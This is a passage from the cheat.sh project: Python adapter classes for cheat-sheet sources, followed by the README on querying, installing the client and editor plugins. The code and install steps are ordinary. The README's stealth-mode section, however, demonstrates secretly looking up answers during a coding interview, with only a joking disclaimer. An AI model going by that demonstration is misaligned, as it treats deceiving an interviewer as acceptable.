'_'.join(block_name.strip(", ").split()) return block_name return None @staticmethod def _cut_block(block, start_block=False): answer = block[2:-1] if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnHaskellAdapter(LearnXYAdapter): """ Learn Haskell in Y Minutes """ prefix = "haskell" _filename = "haskell.html.markdown" _replace_with = { 'More_about_Objects': 'Prototypes', } def _is_block_separator(self, before, now, after): if (re.match('------+', before) and re.match(r'--+\s+[0-9]+\.', now) and re.match('------+', after)): block_name = re.sub(r'--+\s+[0-9]+\.\s*', '', now) block_name = '_'.join(block_name.strip(", ").split()) for k in self._replace_with: if k in block_name: block_name = self._replace_with[k] return block_name return None @staticmethod def _cut_block(block, start_block=False): answer = block[2:-1] if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnLispAdapter(LearnXYAdapter): "Learn Lisp in Y Minutes" prefix = "lisp" _filename = "common-lisp.html.markdown" _splitted = False class LearnLuaAdapter(LearnXYAdapter): """ Learn Lua in Y Minutes """ prefix = "lua" _filename = "lua.html.markdown" _replace_with = { '1_Metatables_and_metamethods': 'Metatables', '2_Class-like_tables_and_inheritance': 'Class-like_tables', 'Variables_and_flow_control': 'Flow_control', } def _is_block_separator(self, before, now, after): if (re.match('-----+', before) and re.match('-------+', after) and re.match(r'--\s+[0-9]+\.', now)): block_name = re.sub(r'--+\s+[0-9]+\.\s*', '', now) block_name = '_'.join(block_name.strip('.').strip().split()) if block_name in self._replace_with: block_name = self._replace_with[block_name] return block_name return None @staticmethod def _cut_block(block, start_block=False): answer = block[2:-1] if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnMathematicaAdapter(LearnXYAdapter): "Learn Mathematica in Y Minutes" prefix = "mathematica" _filename = "wolfram.html.markdown" _splitted = False class LearnMatlabAdapter(LearnXYAdapter): "Learn Matlab in Y Minutes" prefix = "matlab" _filename = "matlab.html.markdown" _splitted = False class LearnOctaveAdapter(LearnXYAdapter): "Learn Octave in Y Minutes" prefix = "octave" _filename = "matlab.html.markdown" _splitted = False class LearnKotlinAdapter(LearnXYAdapter): """ Learn Kotlin in Y Minutes """ prefix = "kotlin" _filename = "kotlin.html.markdown" def _is_block_separator(self, before, now, after): if (re.match('#######+', before) and re.match('#######+', after) and re.match(r'#+\s+[0-9]+\.', now)): block_name = re.sub(r'#+\s+[0-9]+\.\s*', '', now) block_name = '_'.join(block_name.strip().split()) return block_name return None @staticmethod def _cut_block(block, start_block=False): answer = block[2:-1] if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnObjectiveCAdapter(LearnXYAdapter): "Learn Objective C in Y Minutes" prefix = "objective-c" _filename = "objective-c.html.markdown" _splitted = False class LearnOCamlAdapter(LearnXYAdapter): """ Learn OCaml in Y Minutes """ prefix = "ocaml" _filename = "ocaml.html.markdown" _replace_with = { 'More_about_Objects': 'Prototypes', } def _is_block_separator(self, before, now, after): if (re.match(r'\s*', before) and re.match(r'\(\*\*\*+', now) and re.match(r'\s*', after)): block_name = re.sub(r'\(\*\*\*+\s*', '', now) block_name = re.sub(r'\s*\*\*\*\)', '', block_name) block_name = '_'.join(block_name.strip(", ").split()) for k in self._replace_with: if k in block_name: block_name = self._replace_with[k] return block_name return None @staticmethod def _cut_block(block, start_block=False): answer = block[2:-1] if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnPerlAdapter(LearnXYAdapter): """ Learn Perl in Y Minutes """ prefix = "perl" _filename = "perl.html.markdown" _replace_with = { 'Conditional_and_looping_constructs': 'Control_Flow', 'Perl_variable_types': 'Types', 'Files_and_I/O': 'Files', 'Writing_subroutines': 'Subroutines', } def _is_block_separator(self, before, now, after): if re.match(r'####+\s+', now): block_name = re.sub(r'#+\s', '', now) block_name = '_'.join(block_name.strip().split()) if block_name in self._replace_with: block_name = self._replace_with[block_name] return block_name else: return None @staticmethod def _cut_block(block, start_block=False): if not start_block: answer = block[2:] if answer == []: return answer if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnPerl6Adapter(LearnXYAdapter): "Learn Perl 6 in Y Minutes" prefix = "perl6" _filename = "perl6.html.markdown" _splitted = False class LearnPHPAdapter(LearnXYAdapter): """ Learn PHP in Y Minutes """ prefix = "php" _filename = "php.html.markdown" def _is_block_separator(self, before, now, after): if (re.match(r'/\*\*\*\*\*+', before) and re.match(r'\s*\*/', after) and re.match(r'\s*\*\s*', now)): block_name = re.sub(r'\s*\*\s*', '', now) block_name = re.sub(r'&', '', block_name) block_name = '_'.join(block_name.strip().split()) return block_name return None @staticmethod def _cut_block(block, start_block=False): return block[2:] class LearnPythonAdapter(LearnXYAdapter): """ Learn Python in Y Minutes """ prefix = "python" _filename = "python.html.markdown" def _is_block_separator(self, before, now, after): if (re.match('#######+', before) and re.match('#######+', after) and re.match(r'#+\s+[0-9]+\.', now)): block_name = re.sub(r'#+\s+[0-9]+\.\s*', '', now) block_name = '_'.join(block_name.strip().split()) return block_name return None @staticmethod def _cut_block(block, start_block=False): answer = block[2:-1] if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnPython3Adapter(LearnXYAdapter): "Learn Python 3 in Y Minutes" prefix = "python3" _filename = "python3.html.markdown" _splitted = False class LearnRAdapter(LearnXYAdapter): "Learn R in Y Minutes" prefix = "r" _filename = "r.html.markdown" _splitted = False class LearnRacketAdapter(LearnXYAdapter): "Learn Racket in Y Minutes" prefix = "racket" _filename = "racket.html.markdown" _splitted = False class LearnRubyAdapter(LearnXYAdapter): """ Learn Ruby in Y Minutes Format of the file was changed, so we have to fix the function too. This case is a good case for health check: if number of extracted cheat sheets is suddenly became 1, one should check the markup """ prefix = "ruby" _filename = "ruby.html.markdown" def _is_block_separator(self, before, now, after): if (re.match('#######+', before) and re.match('#######+', after) and re.match(r'#+\s+[0-9]+\.', now)): block_name = re.sub(r'#+\s+[0-9]+\.\s*', '', now) block_name = '_'.join(block_name.strip().split()) return block_name return None @staticmethod def _cut_block(block, start_block=False): answer = block[2:-1] if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnRustAdapter(LearnXYAdapter): "Learn Rust in Y Minutes" prefix = "rust" _filename = "rust.html.markdown" _splitted = False class LearnSolidityAdapter(LearnXYAdapter): "Learn Solidity in Y Minutes" prefix = "solidity" _filename = "solidity.html.markdown" _splitted = False class LearnSwiftAdapter(LearnXYAdapter): "Learn Swift in Y Minutes" prefix = "swift" _filename = "swift.html.markdown" _splitted = False class LearnTclAdapter(LearnXYAdapter): "Learn Tcl in Y Minutes" prefix = "tcl" _filename = "tcl.html.markdown" _splitted = False class LearnTcshAdapter(LearnXYAdapter): "Learn Tcsh in Y Minutes" prefix = "tcsh" _filename = "tcsh.html.markdown" _splitted = False class LearnVisualBasicAdapter(LearnXYAdapter): "Learn Visual Basic in Y Minutes" prefix = "vb" _filename = "visualbasic.html.markdown" _splitted = False class LearnCMakeAdapter(LearnXYAdapter): "Learn CMake in Y Minutes" prefix = "cmake" _filename = "cmake.html.markdown" _splitted = False class LearnNimAdapter(LearnXYAdapter): "Learn Nim in Y Minutes" prefix = "nim" _filename = "nim.html.markdown" _splitted = False class LearnGitAdapter(LearnXYAdapter): "Learn Git in Y Minutes" prefix = "git" _filename = "git.html.markdown" _splitted = False class LearnLatexAdapter(LearnXYAdapter): "Learn Nim in Y Minutes" prefix = "latex" _filename = "latex.html.markdown" _splitted = False _ADAPTERS = {cls.prefix: cls() for cls in vars()['LearnXYAdapter'].__subclasses__()} File: lib/adapter/common.py class Adapter(object): pass class cheatAdapter(Adapter): pass File: lib/adapter/rosetta.py """ Implementation of RosettaCode Adapter. Exports: Rosetta(GitRepositoryAdapter) """ # pylint: disable=relative-import import os import glob import yaml from .git_adapter import GitRepositoryAdapter from .cheat_sheets import CheatSheets class Rosetta(GitRepositoryAdapter): """ Adapter for RosettaCode """ _adapter_name = "rosetta" _output_format = "code" _local_repository_location = "RosettaCodeData" _repository_url = "https://github.com/acmeism/RosettaCodeData" __section_name = "rosetta" def __init__(self): GitRepositoryAdapter.__init__(self) self._rosetta_code_name = self._load_rosetta_code_names() @staticmethod def _load_rosetta_code_names(): answer = {} lang_files_location = CheatSheets.local_repository_location(cheat_sheets_location=True) for filename in glob.glob(os.path.join(lang_files_location, '*/_info.yaml')): text = open(filename, 'r').read() data = yaml.load(text, Loader=yaml.SafeLoader) if data is None: continue lang = os.path.basename(os.path.dirname(filename)) if lang.startswith('_'): lang = lang[1:] if 'rosetta' in data: answer[lang] = data['rosetta'] return answer def _rosetta_get_list(self, query, task=None): if query not in self._rosetta_code_name: return [] lang = self._rosetta_code_name[query] answer = [] if task: glob_path = os.path.join(self.local_repository_location(), 'Lang', lang, task, '*') else: glob_path = os.path.join(self.local_repository_location(), 'Lang', lang, '*') for filename in glob.glob(glob_path): taskname = os.path.basename(filename) answer.append(taskname) answer = "".join("%s\n" % x for x in sorted(answer)) return answer @staticmethod def _parse_query(query): if '/' in query: task, subquery = query.split('/', 1) else: task, subquery = query, None return task, subquery def _get_task(self, lang, query): if lang not in self._rosetta_code_name: return "" task, subquery = self._parse_query(query) if task == ':list': return self._rosetta_get_list(lang) if subquery == ':list': return self._rosetta_get_list(lang, task=task) # if it is not a number or the number is too big, just ignore it index = 1 if subquery: try: index = int(subquery) except ValueError: pass lang_name = self._rosetta_code_name[lang] tasks = sorted(glob.glob( os.path.join(self.local_repository_location(), 'Lang', lang_name, task, '*'))) if not tasks: return "" if len(tasks) < index or index < 1: index = 1 answer_filename = tasks[index-1] answer = open(answer_filename, 'r').read() return answer def _starting_page(self, query): number_of_pages = self._rosetta_get_list(query) answer = ( "# %s pages available\n" "# use /:list to list" ) % number_of_pages return answer def _get_page(self, topic, request_options=None): if '/' not in topic: return self._rosetta_get_list(topic) lang, topic = topic.split('/', 1) # this part should be generalized # currently we just remove the name of the adapter from the path if topic == self.__section_name: return self._starting_page(topic) if topic.startswith(self.__section_name + '/'): topic = topic[len(self.__section_name + '/'):] return self._get_task(lang, topic) def _get_list(self, prefix=None): return [] def get_list(self, prefix=None): answer = [self.__section_name] for i in self._rosetta_code_name: answer.append('%s/%s/' % (i, self.__section_name)) return answer def is_found(self, _): return True File: lib/adapter/upstream.py """ Adapter for an external cheat sheets service (i.e. for cheat.sh) Configuration parameters: upstream.url upstream.timeout """ # pylint: disable=relative-import import textwrap import requests from config import CONFIG from .adapter import Adapter def _are_you_offline(): return textwrap.dedent( """ . Are you offline? _________________ | | ___________ |o| Though it could be theoretically possible | | ___________ | | to use cheat.sh fully offline, | | ___________ | | and for *the programming languages questions* too, | | ___________ | | this very feature is not yet implemented. | |_____________| | | _______ | If you find it useful, please visit | | | || https://github.com/chubin/issues/140 | DD | | V| and drop a couple of lines to encourage |____|_______|____| the authors to develop it as soon as possible . """) class UpstreamAdapter(Adapter): """ Connect to the upstream server `CONFIG["upstream.url"]` and fetch response from it. The response is supposed to have the "ansi" format. If the server does not respond within `CONFIG["upstream.timeout"]` seconds, or if a connection error occurs, the "are you offline" banner is displayed. Answers are by default cached; the failure answer is marked with the no-cache property ("cache": False). """ _adapter_name = "upstream" _output_format = "ansi" _cache_needed = False def _get_page(self, topic, request_options=None): options_string = "&".join(["%s=%s" % (x, y) for (x, y) in request_options.items()]) url = CONFIG["upstream.url"].rstrip('/') \ + '/' + topic.lstrip('/') \ + "?" + options_string try: response = requests.get(url, timeout=CONFIG["upstream.timeout"]) answer = {"cache": False, "answer": response.text} except requests.exceptions.ConnectionError: answer = {"cache": False, "answer":_are_you_offline()} return answer def _get_list(self, prefix=None): return [] File: lib/adapter/git_adapter.py """ Implementation of `GitRepositoryAdapter`, adapter that is used to handle git repositories """ import glob import os from .adapter import Adapter # pylint: disable=relative-import def _get_filenames(path): return [os.path.split(topic)[1] for topic in glob.glob(path)] class RepositoryAdapter(Adapter): """ Implements methods needed to handle standard repository based adapters. """ def _get_list(self, prefix=None): """ List of files in the cheat sheets directory with the extension removed """ answer = _get_filenames( os.path.join( self.local_repository_location(), self._cheatsheet_files_prefix, '*'+self._cheatsheet_files_extension)) ext = self._cheatsheet_files_extension if ext: answer = [filename[:-len(ext)] for filename in answer if filename.endswith(ext)] return answer def _get_page(self, topic, request_options=None): filename = os.path.join( self.local_repository_location(), self._cheatsheet_files_prefix, topic) if os.path.exists(filename) and not os.path.isdir(filename): answer = self._format_page(open(filename, 'r').read()) else: # though it should not happen answer = "%s:%s not found" % (str(self.__class__), topic) return answer class GitRepositoryAdapter(RepositoryAdapter): #pylint: disable=abstract-method """ Implements all methods needed to handle cache handling for git-repository-based adapters """ @classmethod def fetch_command(cls): """ Initial fetch of the repository. Return cmdline that has to be executed to fetch the repository. Skipping if `self._repository_url` is not specified """ if not cls._repository_url: return None if not cls._repository_url.startswith('https://github.com/'): # in this case `fetch` has to be implemented # in the distinct adapter subclass raise RuntimeError( "Do not known how to handle this repository: %s" % cls._repository_url) local_repository_dir = cls.local_repository_location() if not local_repository_dir: return None return ['git', 'clone', '--depth=1', cls._repository_url, local_repository_dir] @classmethod def update_command(cls): """ Update of the repository. Return cmdline that has to be executed to update the repository inside `local_repository_location()`. """ if not cls._repository_url: return None local_repository_dir = cls.local_repository_location() if not local_repository_dir: return None if not cls._repository_url.startswith('https://github.com/'): # in this case `update` has to be implemented # in the distinct adapter subclass raise RuntimeError( "Do not known how to handle this repository: %s" % cls._repository_url) return ['git', 'pull'] @classmethod def current_state_command(cls): """ Get current state of repository (current revision). This is used to find what cache entries should be invalidated. """ if not cls._repository_url: return None local_repository_dir = cls.local_repository_location() if not local_repository_dir: return None if not cls._repository_url.startswith('https://github.com/'): # in this case `update` has to be implemented # in the distinct adapter subclass raise RuntimeError( "Do not known how to handle this repository: %s" % cls._repository_url) return ['git', 'rev-parse', '--short', 'HEAD', "--"] @classmethod def save_state(cls, state): """ Save state `state` of the repository. Must be called after the cache clean up. """ local_repository_dir = cls.local_repository_location() state_filename = os.path.join(local_repository_dir, '.cached_revision') open(state_filename, 'wb').write(state) @classmethod def get_state(cls): """ Return the saved `state` of the repository. If state cannot be read, return None """ local_repository_dir = cls.local_repository_location() state_filename = os.path.join(local_repository_dir, '.cached_revision') state = None if os.path.exists(state_filename): state = open(state_filename, 'r').read() return state @classmethod def get_updates_list_command(cls): """ Return list of updates since the last update whose id is saved as the repository state. The list is used to invalidate the cache. """ current_state = cls.get_state() if not current_state: return ['git', 'ls-tree', '--full-tree', '-r', '--name-only', 'HEAD', "--"] return ['git', 'diff', '--name-only', current_state, 'HEAD', "--"]
![cheat.sh logo](http://cheat.sh/files/big-logo-v2-fixed.png) Unified access to the best community driven cheat sheets repositories of the world. Let's imagine for a moment that there is such a thing as an ideal cheat sheet. What should it look like? What features should it have? * **Concise** — It should only contain the things you need, and nothing else. * **Fast** — It should be possible to use it instantly. * **Comprehensive** — It should contain answers for every possible question. * **Universal** — It should be available everywhere, anytime, without any preparations. * **Unobtrusive** — It should not distract you from your main task. * **Tutoring** — It should help you to learn the subject. * **Inconspicuous** — It should be possible to use it completely unnoticed. Such a thing exists! It's easy to [install](#installation) and there's even [auto-complete](#tab-completion). ## Features **cheat.sh** * Has a simple curl/browser/editor interface. * Covers 56 programming languages, several DBMSes, and more than 1000 most important UNIX/Linux commands. * Provides access to the best community driven cheat sheets repositories in the world, on par with StackOverflow. * Available everywhere, no installation needed, but can be installed for offline usage. * Ultrafast, returns answers within 100 ms, as a rule. * Has a convenient command line client, `cht.sh`, that is very advantageous and helpful, though not mandatory. * Can be used directly from code editors, without opening a browser and not switching your mental context. * Supports a special stealth mode where it can be used fully invisibly without ever touching a key and making sounds. <p align="center"> <img src='https://cheat.sh/files/demo-curl.gif'/> </p> ## Contents * [Features](#features) * [Usage](#usage) * [Command line client, cht.sh](#command-line-client-chtsh) * [Installation](#installation) * [Client usage](#client-usage) * [Tab-completion](#tab-completion) - [Bash Tab completion](#bash-tab-completion) - [ZSH Tab completion](#zsh-tab-completion) * [Stealth mode](#stealth-mode) * [Windows command line client](#windows-command-line-client) * [Self-Hosting](#self-hosting) * [Docker](#docker) * [Editors integration](#editors-integration) * [Vim](#vim) * [Emacs](#emacs) * [Visual Studio Code](#visual-studio-code) * [Sublime](#sublime) * [IntelliJ IDEA](#intellij-idea) * [QT Creator](#qtcreator) * [Special pages](#special-pages) * [Search](#search) * [Programming languages cheat sheets](#programming-languages-cheat-sheets) * [Cheat sheets sources](#cheat-sheets-sources) * [How to contribute](#how-to-contribute) * [How to edit a cheat sheet](#how-to-edit-a-cheat-sheet) * [How to add a cheat sheet](#how-to-add-a-cheat-sheet) * [How to add a cheat sheet repository](#how-to-add-a-cheat-sheet-repository) ## Usage To get a cheat sheet for a UNIX/Linux command from a command line, query the service using `curl` or any other HTTP/HTTPS client specifying the name of the command in the query: ``` curl cheat.sh/tar curl cht.sh/curl curl https://cheat.sh/rsync curl https://cht.sh/tr ``` As you can see, you can use both HTTPS and HTTP to access the service, and both the long (cheat.sh) and the short (cht.sh) service names. Here `tar`, `curl`, `rsync`, and `tr` are names of the UNIX/Linux commands you want to get cheat sheets for. If you don't know the name of the command you need, you can search for it using the `~KEYWORD` notation. For example, to see how you can make `snapshots` of a filesystem/volume/something else: ``` curl cht.sh/~snapshot ``` <p align="center"> <img src='https://cheat.sh/files/cht.sh-url-structure.png'/> </p> The programming language cheat sheets are located in special namespaces dedicated to them. ``` curl cht.sh/go/Pointers curl cht.sh/scala/Functions curl cht.sh/python/lambda ``` To get the list of available programming language cheat sheets, use the special query `:list`: ``` curl cht.sh/go/:list ``` Almost each programming language has a special page named `:learn` that describes the language basics (that's a direct mapping from the *"Learn X in Y"* project). It could be a good starting point if you've just started learning a language. If there is no cheat sheet for a programming language query (and it is almost always the case), it is generated on the fly, based on available cheat sheets and answers on StackOverflow. Of course, there is no guarantee that the returned cheat sheet will be a 100% hit, but it is almost always exactly what you are looking for. Try these (and your own) queries to get the impression of that, what the answers look like: ``` curl cht.sh/go/reverse+a+list curl cht.sh/python/random+list+elements curl cht.sh/js/parse+json curl cht.sh/lua/merge+tables curl cht.sh/clojure/variadic+function ``` If you don't like an answer for your queries, you can pick another one. For that, repeat the query with an additional parameter `/1`, `/2` etc. appended: ``` curl cht.sh/python/random+string curl cht.sh/python/random+string/1 curl cht.sh/python/random+string/2 ``` Cheat sheets are formatted as code of the queried programming language (at least we are trying our best to do so) so they can be pasted into a program in this language directly. Text comments, if there are any, are formatted according to the language syntax. ```lua $ curl cht.sh/lua/table+keys -- lua: retrieve list of keys in a table local keyset={} local n=0 for k,v in pairs(tab) do n=n+1 keyset[n]=k end --[[ [ Note that you cannot guarantee any order in keyset. If you want the [ keys in sorted order, then sort keyset with table.sort(keyset). [ [ [lhf] [so/q/12674345] [cc by-sa 3.0] ]] ``` If you don't need text comments in the answer, you can eliminate them using a special option `\?Q`: ```lua $ curl cht.sh/lua/table+keys\?Q local keyset={} local n=0 for k,v in pairs(tab) do n=n+1 keyset[n]=k end ``` And if you don't need syntax highlighting, switch it off using `\?T`. You can combine the options together: ``` curl cht.sh/go/reverse+a+list\?Q curl cht.sh/python/random+list+elements\?Q curl cht.sh/js/parse+json\?Q curl cht.sh/lua/merge+tables\?QT curl cht.sh/clojure/variadic+function\?QT ``` Full list of all options described below and in `/:help`. Try your own queries. Follow these rules: 1. Try to be more specific (`/python/append+file` is better than `/python/file` and `/python/append`). 2. Ask practical question if possible (yet theoretical question are possible too). 3. Ask programming language questions only; specify the name of the programming language as the section name. 4. Separate words with `+` instead of spaces. 5. Do not use special characters, they are ignored anyway. 6. If you want to eliminate cheat sheets containing some word, add it to the query with `+-`: `python/multiply+matrices+-numpy` Read more about the programming languages queries below. ---- ## Command line client, cht.sh The cheat.sh service has its own command line client (`cht.sh`) that has several useful features compared to querying the service directly with `curl`: * Special shell mode with a persistent queries context and readline support. * Queries history. * Clipboard integration. * Tab completion support for shells (bash, fish, zsh). * Stealth mode. ### Installation To install the client: ```bash PATH_DIR="$HOME/bin" # or another directory on your $PATH mkdir -p "$PATH_DIR" curl https://cht.sh/:cht.sh > "$PATH_DIR/cht.sh" chmod +x "$PATH_DIR/cht.sh" ``` or to install it globally (for all users): ```bash curl -s https://cht.sh/:cht.sh | sudo tee /usr/local/bin/cht.sh && sudo chmod +x /usr/local/bin/cht.sh ``` Note: The package "rlwrap" is a required dependency to run in shell mode. Install this using `sudo apt install rlwrap` ### Client usage Now, you can use `cht.sh` instead of `curl`, and write your queries in more natural way, with spaces instead of `+`: ``` $ cht.sh go reverse a list $ cht.sh python random list elements $ cht.sh js parse json ``` It is even more convenient to start the client in a special shell mode: ``` $ cht.sh --shell cht.sh> go reverse a list ``` If all your queries are about the same language, you can change the context and spare repeating the programming language name: ``` $ cht.sh --shell cht.sh> cd go cht.sh/go> reverse a list ``` or even start the client in this context: ``` $ cht.sh --shell go cht.sh/go> reverse a list ... cht.sh/go> join a list ... ``` If you want to change the context, you can do it with the `cd` command, or if you want do a single query for some other language, just prepend it with `/`: ``` $ cht.sh --shell go ... cht.sh/go> /python dictionary comprehension ... ``` If you want to copy the last answer into the clipboard, you can use the `c` (`copy`) command, or `C` (`ccopy`, without comments). ``` cht.sh/python> append file # python - How do you append to a file? with open("test.txt", "a") as myfile: myfile.write("appended text") cht.sh/python> C copy: 2 lines copied to the selection ``` Type `help` for other internal `cht.sh` commands. ``` cht.sh> help help - show this help hush - do not show the 'help' string at start anymore cd LANG - change the language context copy - copy the last answer in the clipboard (aliases: yank, y, c) ccopy - copy the last answer w/o comments (cut comments; aliases: cc, Y, C) exit - exit the cheat shell (aliases: quit, ^D) id [ID] - set/show an unique session id ("reset" to reset, "remove" to remove) stealth - stealth mode (automatic queries for selected text) update - self update (only if the scriptfile is writeable) version - show current cht.sh version /:help - service help QUERY - space separated query staring (examples are below) cht.sh> python zip list cht.sh/python> zip list cht.sh/go> /python zip list ``` The `cht.sh` client has its configuration file which is located at `~/.cht.sh/cht.sh.conf` (location of the file can be overridden by the environment variable `CHTSH_CONF`). Use it to specify query options that you would use with each query. For example, to switch syntax highlighting off create the file with the following content: ```bash CHTSH_QUERY_OPTIONS="T" ``` Or if you want to use a special syntax highlighting theme: ```bash CHTSH_QUERY_OPTIONS="style=native" ``` (`curl cht.sh/:styles-demo` to see all supported styles). Other cht.sh configuration parameters: ```bash CHTSH_CURL_OPTIONS="-A curl" # curl options used for cht.sh queries CHTSH_URL=https://cht.sh # URL of the cheat.sh server ``` ### Tab completion #### Bash Tab completion To activate tab completion support for `cht.sh`, add the `:bash_completion` script to your `~/.bashrc`: ```bash curl https://cheat.sh/:bash_completion > ~/.bash.d/cht.sh . ~/.bash.d/cht.sh # and add . ~/.bash.d/cht.sh to ~/.bashrc ``` #### ZSH Tab completion To activate tab completion support for `cht.sh`, add the `:zsh` script to the *fpath* in your `~/.zshrc`: ```zsh curl https://cheat.sh/:zsh > ~/.zsh.d/_cht echo 'fpath=(~/.zsh.d/ $fpath)' >> ~/.zshrc # Open a new shell to load the plugin ``` ---- ### Stealth mode Being used fully unnoticed is one of the most important property of any cheat sheet. cheat.sh can be used completely unnoticed too. The cheat.sh client, `cht.sh`, has a special mode, called **stealth mode**. Using that, you don't even need to touch your keyboard to open a cheat sheet. In this mode, as soon as you select some text with the mouse (and thus adding it into the selection buffer of X Window System or into the clipboard) it's used as a query string for cheat.sh, and the correspondent cheat sheet is automatically shown. Let's imagine, that you are having an online interview, where your interviewer asks you some questions using a shared document (say Google Docs) and you are supposed to write your coding answers there (it's possible too that you'll type in the questions on your own, just to show to the interviewer that you've heard it right). When using the stealth mode of `cht.sh`, the only thing you need to do in order to see a cheat sheet for some question, is to select the question using the mouse. If you don't want any text in the answers and the only thing you need is code, use the `Q` option when starting the stealth mode. <p align="center"> <img src='https://cheat.sh/files/stealth-mode.gif'/> </p> ``` You: Hi! | $ cht.sh --shell python She: Hi! | cht.sh/python> stealth Q She: Are you ready for a small interview? | stealth: you are in the stealth mode; select any text She: Just a couple of questions | stealth: selections longer than 5 words are ignored She: We will talk about python | stealth: query arguments: ?Q She: Let's start from something simple. | stealth: use ^C to leave this mode She: Do you know how to reverse a list in python? | You: Sure | You: (selecting "reverse a list") | stealth: reverse a list | reverse_lst = lst[::-1] You: lst[::-1]? | She: Good. | She: Do you know how to chain a list of lists? | You: (selecting "chain a list of lists") | stealth: chain a list of lists | import itertools | a = [["a","b"], ["c"]] | print list(itertools.chain.from_iterable(a)) You: May I use external modules? | She: What module do you want to use? | You: itertools | She: Yes, you may use it | You: Ok, then: | You: itertools.chain.from_iterable(a) | She: Good. Let's try something harder. | She: What about quicksort implementation? | You: (selecting "quicksort implementation") | stealth: quicksort implementation You: Let me think about it. | (some big and clumsy lowlevel implementation shown) You: Well...(starting typing it in) | def sort(array=[12,4,5,6,7,3,1,15]): | less = [] She: (seeing your ugly pascal style) | equal = [] She: Could you write it more concise? | greater = [] | if len(array) > 1: You: What do you mean? | pivot = array[0] | for x in array: She: I mean, | if x < pivot: less.append(x) She: do you really need all these ifs and fors? | if x == pivot: equal.append(x) She: Could you maybe just use filter instead? | if x > pivot: greater.append(x) | return sort(less)+equal+sort(greater) You: quicksort with filter? | else: | return array She: Yes | You: (selecting "quicksort with filter") | stealth: quicksort with filter You: Ok, I will try. | return qsort(filter(lt, L[1:]))+[pivot] \ You: Something like this? | +qsort(filter(ge, L[1:])) You: qsort(filter(lt, L[1:]))+[pivot] \ | + qsort(filter(ge, L[1:])) | | She: Yes! Perfect! Exactly what I wanted to see! | | ``` Of course, this is just for fun, and you should never cheat in your coding interviews, because you know what happens when you do. ![when you lie in your interview](http://cheat.sh/files/when-you-lie-katze.png) ### Windows command line client You can access cheat.sh from Windows command line too. Use cheat.sh command line client for that: [`cht.exe`](https://github.com/tpanj/cht.exe). It supports: * output colorization; * command line options; * its own configuration file. You can also use [`scoop`](https://github.com/lukesampson/scoop) command-line installer for Windows to get it: ```batch scoop install cht ``` ---- ## Self-Hosting ### Docker Currently, the easiest way to get a self-hosted instance running is by using the `docker-compose.yml` file. docker-compose up This builds and runs the image with baked in cheatsheets and starts the app and a Redis instance to back it, making the service available at http://localhost:8002 This is currently an early implementation and should probably not be used for anything outside of internal/dev/personal use right now. ## Editors integration You can use *cheat.sh* directly from the editor (*Emacs*, *Sublime*, *Vim*, and *Visual Studio Code* are currently supported; not all features are supported by all plugins though; see below). Instead of opening your browser, googling, browsing Stack Overflow and eventually copying the code snippets you need into the clipboard and later pasting them into the editor, you can achieve the same instantly and without leaving the editor at all! Here is what it looks like in Vim: 1. If you have a question while editing a program, you can just type your question directly in the buffer and press `<leader>KK`. You will get the answer to your question in pager. (with `<leader>KB` you'll get the answer in a separate buffer). 2. If you like the answer, you can manually paste it from the buffer or the pager, or if you are lazy you can use `<leader>KP` to paste it below/under your question (or replace you question using `<leader>KR`). If you want the answer without the comments, `<leader>KC` replays the last query toggling them. If you use some static analysis plugin such as *syntastic* (for Vim), you can use its warning and error messages as cheat.sh queries: place the cursor on the problem line and press `<leader>KE`: explanation for the warning will be opened in a new buffer. Features supported by cheat.sh plugins for different editors: |Feature |Emacs|Sublime|Vim|VSCode|IDEA|QtCreator| |-------------------|-----|-------|---|------|----|---------| |Command queries |✓ |✓ |✓ |✓ |✓ |✓ | |Queries from buffer| | |✓ |✓ | |✓ | |Toggle comments | | |✓ |✓ |✓ |✓ | |Prev/next answer | | |✓ |✓ |✓ |✓ | |Multiple answers | |✓ | | |✓ | | |Warnings as queries| | |✓ | | | | |Queries history | | |✓ |✓ | | | |Session id | | |✓ | | | | |Configurable server|✓ | |✓ |✓ | |✓ | ### Vim * [cheat.sh-vim](https://github.com/dbeniamine/cheat.sh-vim) — Vim support Here is Vim configuration example: ```vim " some configuration above ... let mapleader=" " call vundle#begin() Bundle 'gmarik/vundle' Bundle 'scrooloose/syntastic' Bundle 'dbeniamine/cheat.sh-vim' call vundle#end() let g:syntastic_javascript_checkers = [ 'jshint' ] let g:syntastic_ocaml_checkers = ['merlin'] let g:syntastic_python_checkers = ['pylint'] let g:syntastic_shell_checkers = ['shellcheck'] " some configuration below ... ``` In this example, several Vim plugins are used: * [gmarik/vundle](https://github.com/VundleVim/Vundle.vim) — Vim plugin manager * [scrooloose/syntastic](https://github.com/vim-syntastic/syntastic) — Syntax checking plugin * [cheat.sh-vim](https://github.com/dbeniamine/cheat.sh-vim) — Vim support Syntastic shows warnings and errors (found by code analysis tools: `jshint`, `merlin`, `pylint`, `shellcheck` etc.), and `cheat.sh-vim` shows you explanations for the errors and warnings and answers on programming languages queries written in the editor. Watch a demo, where the most important features of the cheat.sh Vim plugin are shown (5 Min): <p align="center"> <img src='https://cheat.sh/files/vim-demo.gif'/> </p> Or, if you want to scroll and/or pause, the same on YouTube: <p align="center"> <a href="http://www.youtube.com/watch?feature=player_embedded&v=xyf6MJ0y-z8 " target="_blank"><img src="http://img.youtube.com/vi/xyf6MJ0y-z8/0.jpg" alt="cheat.sh-vim: Using cheat.sh from vim" width="700" height="490" border="10" /></a> </p> <!-- [![asciicast](https://asciinema.org/a/c6QRIhus7np2OOQzmQ2RNXzRZ.png)](https://asciinema.org/a/c6QRIhus7np2OOQzmQ2RNXzRZ) --> ### Emacs * [cheat-sh.el](https://github.com/davep/cheat-sh.el) — Emacs support (available also at cheat.sh/:emacs) * cheat.sh/:emacs-ivy — Emacs support for ivy users [![asciicast](https://asciinema.org/a/3xvqwrsu9g4taj5w526sb2t35.png)](https://asciinema.org/a/3xvqwrsu9g4taj5w526sb2t35) ### Visual Studio Code * [vscode-snippet](https://github.com/mre/vscode-snippet) * Install it 